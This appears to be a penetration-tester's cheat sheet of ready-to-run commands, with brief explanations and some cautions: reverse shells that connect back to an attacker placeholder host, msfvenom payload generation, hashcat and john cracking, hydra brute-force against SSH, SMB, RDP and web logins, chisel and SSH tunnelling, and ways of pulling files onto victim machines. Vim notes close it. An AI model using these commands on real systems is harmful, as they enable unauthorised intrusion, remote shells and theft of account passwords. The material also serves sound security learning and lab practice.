Common

Reverse Shells

Stabilize Shell

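# 1. Upgrade the dumb reverse shell to a pty so job control, tab completion and
#    interactive tools (su, ssh, vim) work
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# 2. Background the remote shell: press Ctrl+Z (a keystroke, not a command)
# 3. In the LOCAL attacker shell: pass raw keystrokes through (Ctrl+C no longer kills
#    the listener) and disable local echo, then foreground the remote shell
stty raw -echo; fg
# 4. Size the remote pty to match your terminal. 38x116 is only an example: read the
#    real numbers with `stty size` in the local terminal before step 2.
stty rows 38 columns 116
# Alternative pty when python is not on the box (script ships with util-linux/bsdutils)
script /dev/null -c bash
# When the session dies the local terminal is still in raw mode; run `stty sane` or `reset`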

MSFVenom

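msfvenom --list payloads

# Underscore payloads (shell_reverse_tcp) are STAGELESS: the complete shell is in the
# file, so a plain listener such as `nc -lvnp 443` works. Slash payloads
# (shell/reverse_tcp) are STAGED and only deliver a loader; they need
# exploit/multi/handler configured with the same payload to push the second stage.
# -o writes the file directly instead of relying on stdout redirection.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=443 -f elf -o shell.elf

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=443 -f exe -o shell.exe

# Listener for the two stageless payloads above (443 is often allowed out through egress filters)
nc -lvnp 443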

Bash

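# /dev/tcp is a bash feature, not a device node: it does not exist under sh/dash, so the
# one-liner silently fails when the injection point runs /bin/sh. That is what the
# `bash -c` wrapper in the second form is for.
bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'
# Drop the shell as a script for cron/sudo/SUID/PATH-hijack triggers. Make it executable,
# otherwise it can only be started as `bash /tmp/shell.sh`. /tmp is world-readable:
# remove the file once the trigger has fired.
echo '#!/bin/bash
bash -i >& /dev/tcp/<IP>/<PORT> 0>&1' > /tmp/shell.sh
chmod +x /tmp/shell.sh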

Password Attacks

Hashcat

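# Without -m hashcat (6.x+) tries to autodetect the type and lists the candidate modes
# when several match; pass -m explicitly rather than guessing from the list.
hashcat <HASH> <WORDLIST>
hashcat -m <MODE> <HASH> <WORDLIST>
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt

# Hashes cracked earlier are kept in the potfile; print them instead of re-running
hashcat -m <MODE> --show <HASH>

# Common -m values (verify with `hashcat --example-hashes`):
#    0   MD5
#  100   SHA1
# 1000   NTLM          <- NOT 100; 100 is SHA1 and will produce no cracks on NT hashes
# 1800   sha512crypt   ($6$ entries from /etc/shadow)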

John

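# Locate the *2john converters installed with john (ssh2john, zip2john, keepass2john, ...)
find / -type f -name "*2john" 2>/dev/null

<tool>2john <FILE> > john.hash

# john takes option values joined with '=' (or ':'). With `--wordlist <WORDLIST>` the
# wordlist is instead treated as another hash file and john falls back to its default
# wordlist, so the crack quietly runs against the wrong list.
john --wordlist=<WORDLIST> john.hash

# Pin the format when autodetection picks the wrong one (john prints the alternatives)
john --format=<FORMAT> --wordlist=<WORDLIST> john.hash

# Show what is already cracked (stored in ~/.john/john.pot) instead of cracking again
john --show john.hash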

Hydra

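# -l Username
# -L Username List
# -p password
# -P password List
# -s <PORT>  non-default port
# -f         stop as soon as one valid pair is found
# -t <N>     parallel tasks (ssh: use -t 4 or less, sshd drops excess connections)

# CAUTION: online guessing against accounts backed by a directory (SSH/SMB/RDP/LDAP on a
# domain) increments the bad-password counter; check the lockout threshold before
# running a long list against real user accounts.

# http-post-form takes the TARGET HOST before the service name; the module argument is
# "<path>:<POST body>:<failure marker>". Use S=<string> instead of F= when only the
# success response is distinctive.
hydra -l admin -P /path/to/password_list.txt <IP> http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"

hydra -l admin -P /path/to/password_list.txt ftp://192.168.1.100

hydra -l admin -P /path/to/password_list.txt -t 4 ssh://192.168.1.100

hydra -l admin -P /path/to/password_list.txt smb://192.168.1.100

hydra -l admin -P /path/to/password_list.txt smtp://mail.server.com

hydra -l admin -P /path/to/password_list.txt mysql://192.168.1.100

hydra -l admin -P /path/to/password_list.txt mssql://192.168.1.100

hydra -l admin -P /path/to/password_list.txt rdp://192.168.1.100

hydra -l user@example.com -P /path/to/password_list.txt pop3://mail.server.com

hydra -l user@example.com -P /path/to/password_list.txt imap://mail.server.com

# Classic VNC auth has no username, hence no -l
hydra -P /path/to/password_list.txt vnc://192.168.1.100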

Port Forwarding

Chisel

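# Attacker: accept reverse tunnels. Without --auth any client that can reach 4444 may
# open ports on this host; add a shared secret on both sides when the network is not yours.
chisel server -p 4444 --reverse
chisel server -p 4444 --reverse --auth <USER>:<PASS>

# Victim: publish the victim's 127.0.0.1:<PORT> on the attacker host.
# The local side of an R: remote defaults to 0.0.0.0, so the forwarded service becomes
# reachable by anyone who can reach the attacker box; bind it to loopback unless you
# really need it exposed.
chisel client <IP>:4444 R:<PORT>:127.0.0.1:<PORT>
chisel client <IP>:4444 R:127.0.0.1:<PORT>:127.0.0.1:<PORT>
.\chisel.exe client <IP>:4444 R:<PORT>:127.0.0.1:<PORT>

# Reverse SOCKS: attacker gets a SOCKS5 listener (default 1080) into the victim's network
chisel client <IP>:4444 R:socks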

SSH

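# Local forward: attacker's <PORT> -> 127.0.0.1:<PORT> as seen from <IP>.
# -L binds to the attacker's loopback by default, so only local tools can reach it.
ssh -L <PORT>:127.0.0.1:<PORT> <USER>@<IP>
# -N opens no remote shell, which is all you want for a dedicated tunnel
ssh -N -L <PORT>:127.0.0.1:<PORT> <USER>@<IP>

#Dynamic /w proxychains
ssh -D 1080 <USER>@<IP>
# proxychains needs a matching entry in its config (/etc/proxychains4.conf or
# /etc/proxychains.conf):   socks5 127.0.0.1 1080
# Only TCP is proxied; ICMP and UDP based tools (ping, most nmap scans) will not work.
proxychains <program>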

File Transfer

python3 -m http.server
sudo python3 -m http.server 80

SCP

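scp -i ~/.ssh/id_rsa source_file user@remote_host:/remote/path

scp source_file user@remote_host:/remote/path #Upload
scp user@remote_host:/remote/file /local/destination #Download
scp -r source_dir user@remote_host:/remote/path #Recursive

# scp uses -P (capital) for the port. The two -o options stop an unknown or changed host
# key from blocking the copy - which also removes scp's only protection against a
# man-in-the-middle on the path. Acceptable for throwaway lab boxes; do not send real
# credentials or sensitive loot over a connection verified this way.
scp -P <PORT> -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no user@remote_host:/remote/file /local/destination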

Certutil

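# Fetches <FILE> into <OUTPUT FILE>; -f overwrites an existing copy. certutil also stores
# the download in the user's URL cache, and certutil-as-downloader is a heavily
# signatured LOLBin, so expect AV/EDR alerts on monitored hosts.
certutil.exe -urlcache -f http://IP:<PORT>/<FILE> <OUTPUT FILE>
# -split is the form most references use; it writes the body out as a file explicitly
certutil.exe -urlcache -split -f http://IP:<PORT>/<FILE> <OUTPUT FILE>
# Remove the cached copy afterwards
certutil.exe -urlcache http://IP:<PORT>/<FILE> delete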

WGET

# Saves into the current directory under the URL's basename; -O <NAME> renames,
# -q silences the progress output.
wget http://<IP>:<Port>/<File>

Curl

# -o writes to the named file (-O would keep the remote name); -s hides the progress meter
curl http://<IP>:<PORT>/<FILE> -o <FILE>

SMB Share

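# Attacker: share the current directory. With no credentials this is an anonymous share
# readable by anyone on the network - keep only transfer files in it and stop the server
# when done.
sudo impacket-smbserver share -smb2support .
# Prefer a throwaway user/password: recent Windows builds refuse unauthenticated (guest)
# SMB access by default, so the anonymous form often fails against patched targets.
sudo impacket-smbserver share -smb2support . -user test -password test123

# Victim (cmd.exe): connect, with or without the throwaway credentials
net use \\IP\share
net use \\IP\share /user:test test123

copy \\IP\share\File File

#Mount Share
net use Z: \\IP\share
Z:
dir
copy File .
# Detach the drive when finished so the mapping does not linger for the next person on the box
net use Z: /delete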

PowerShell IWR

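# Download from cmd.exe through PowerShell (iwr = Invoke-WebRequest, PS 3+)
powershell iwr http://<IP>/file -OutFile file
# On Windows PowerShell 5.1, iwr parses the response with the IE engine and can fail on
# hosts where IE's first-run setup never completed; -UseBasicParsing sidesteps that
powershell -c "iwr -UseBasicParsing http://<IP>/file -OutFile file"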

NC

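# Direction is fixed by the redirects, not by which box is "attacker": the LISTENER
# RECEIVES and the connecting side SENDS. Start the listener first.
nc -lvnp 4444 > file   # receiver: everything that arrives is written to 'file'
nc <IP> 4444 < file    # sender: streams 'file' to the listener
# Raw TCP: no auth, no encryption, no integrity check. Compare a hash on both ends
# before trusting the copy (a truncated binary fails in confusing ways).
sha256sum file
# Some nc builds keep the connection open after EOF: use -q 0 (netcat-traditional) or
# -N (OpenBSD nc) on the sender, or Ctrl+C it once the hashes match.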

Other

File Creation

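# Quoted 'EOF' keeps $vars, backticks and \ literal in the body; unquote it to expand them
cat << 'EOF' > <FILE>
<TEXT>
EOF
# echo '' writes a single newline, so the result is a 1-byte file, not an empty one
echo '' > <File>
# Truly empty (0 bytes) - also the cleanest way to truncate a log
: > <File>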

Python Virtual Environment

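python3 -m venv <NAME> #create venv
source <NAME>/bin/activate #start venv (changes PATH for the current shell only)
deactivate   # leaves venv
rm -rf <NAME>  # deletes venv - the directory created above, whatever it was named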

Vim Macros

VIM CHEAT SHEET

Movement
h        # Left
j        # Down
k        # Up
l        # Right

0        # Beginning of line (absolute start)
^        # First non-whitespace character
$        # End of line

w        # Move to start of next word
e        # Move to end of word
b        # Move to beginning of previous word

Editing
d        # Delete
c        # Change (delete + insert)
y        # Yank (copy)

dw       # Delete word
cw       # Change word
yw       # Copy word
dd       # Delete line
yy       # Copy line

p        # Paste after cursor

Undo / Redo
u        # Undo
Ctrl+r   # Redo

Modes
i        # Insert before cursor
a        # Insert after cursor
I        # Insert at first non-whitespace
A        # Insert at end of line
o        # New line below
O        # New line above
Esc      # Return to normal mode

Macros
q<letter>     # Start recording macro
q             # Stop recording
@<letter>     # Run macro
10@<letter>   # Run macro 10 times
@@            # Repeat last macro

Useful
.        # Repeat last change
%        # Jump between matching brackets

TMUX